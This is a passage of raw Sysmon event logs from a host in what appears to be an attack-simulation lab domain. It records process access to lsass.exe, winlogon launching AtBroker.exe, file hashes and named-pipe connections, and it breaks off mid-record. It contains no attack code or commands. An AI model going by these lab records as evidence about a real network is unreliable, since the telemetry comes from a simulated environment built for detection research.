10341000x8000000000000000441085Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.185{42DC5269-D4D0-6086-FD04-00000000BA01}1144684C:\Windows\Explorer.EXE{42DC5269-1583-6087-F40C-00000000BA01}5820C:\Program Files\OpenJDK\jdk-16.0.1\bin\java.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441084Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.179{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441083Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.164{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441082Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.164{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441081Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.163{42DC5269-CE96-6086-0B00-00000000BA01}6285688C:\Windows\system32\lsass.exe{42DC5269-CE96-6086-0A00-00000000BA01}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441080Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.161{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE5D4F5CFA196DAE68F053BB2CC854EA,SHA256=B2C3E37B39BD218A77086D030507019F0F79817576F6F420361CCC22B74F807C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441079Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.155{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441078Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.142{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0602D3D8B1D29EF83AC7F5EBF9AD468C,SHA256=09B2ADAA7A9085EFD6CB6F9CB805524683494CFBFDEF267F3E8CD89C1C64D54C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441077Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.141{42DC5269-D4D0-6086-FD04-00000000BA01}1144ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpgMD5=B5E3DF90456C7074BB6D1F02409C0980,SHA256=3F30B0B3C32AA16451DE80752F3819A6ECDF939185868065679C49436B901739,IMPHASH=00000000000000000000000000000000falsetrue 18141800x8000000000000000441076Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:44.135{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 23542300x8000000000000000441075Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.135{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72C05C08F805AE925120776F2016FB0A,SHA256=60F57D08E5C2B38CCB081DDD5FC00F057ED409298E3B564885DF15BA090F05CA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441074Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.133{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441073Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.133{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441072Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.131{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441071Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.131{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441070Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.131{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441069Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.131{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441068Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.129{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-D4CC-6086-EA04-00000000BA01}2548C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441067Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.129{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-D4CC-6086-EA04-00000000BA01}2548C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441066Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.127{42DC5269-D4CC-6086-E904-00000000BA01}47844992C:\Windows\system32\csrss.exe{42DC5269-028C-6088-C828-00000000BA01}6748C:\Windows\system32\atbroker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441065Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.126{42DC5269-D4CC-6086-EA04-00000000BA01}2548288C:\Windows\system32\winlogon.exe{42DC5269-028C-6088-C828-00000000BA01}6748C:\Windows\system32\atbroker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+15b13|C:\Windows\system32\winlogon.exe+3b284|C:\Windows\system32\winlogon.exe+38b7a|C:\Windows\system32\winlogon.exe+44b92|C:\Windows\system32\winlogon.exe+b12f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441064Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.126{42DC5269-028C-6088-C828-00000000BA01}6748C:\Windows\System32\AtBroker.exe10.0.14393.0 (rs1_release.160715-1616)Windows Assistive Technology ManagerMicrosoft® Windows® Operating SystemMicrosoft CorporationATBroker.exeatbroker.exeC:\Windows\system32\ATTACKRANGE\Administrator{42DC5269-D4CE-6086-10ED-2D0000000000}0x2ded102HighMD5=8507D8A98EFA12F285A504DAEF14A0A5,SHA256=A84417EE9D039891AF43B267896DB921A40838D8A17CC1BE29785D031E5944D4,IMPHASH=9E9F046950193A8BA7AB446E4274C9D6{42DC5269-D4CC-6086-EA04-00000000BA01}2548C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000441063Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.126{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1700-00000000BA01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441062Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.124{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000441061Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.124{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000441060Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:44.124{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 10341000x8000000000000000441059Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.123{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441058Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.123{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441057Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.123{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM3